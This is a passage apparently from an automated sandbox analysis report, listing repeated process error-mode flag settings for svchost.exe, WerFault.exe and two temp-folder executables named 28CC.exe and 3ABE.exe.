Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process information set: NOOPENFILEERRORBOX
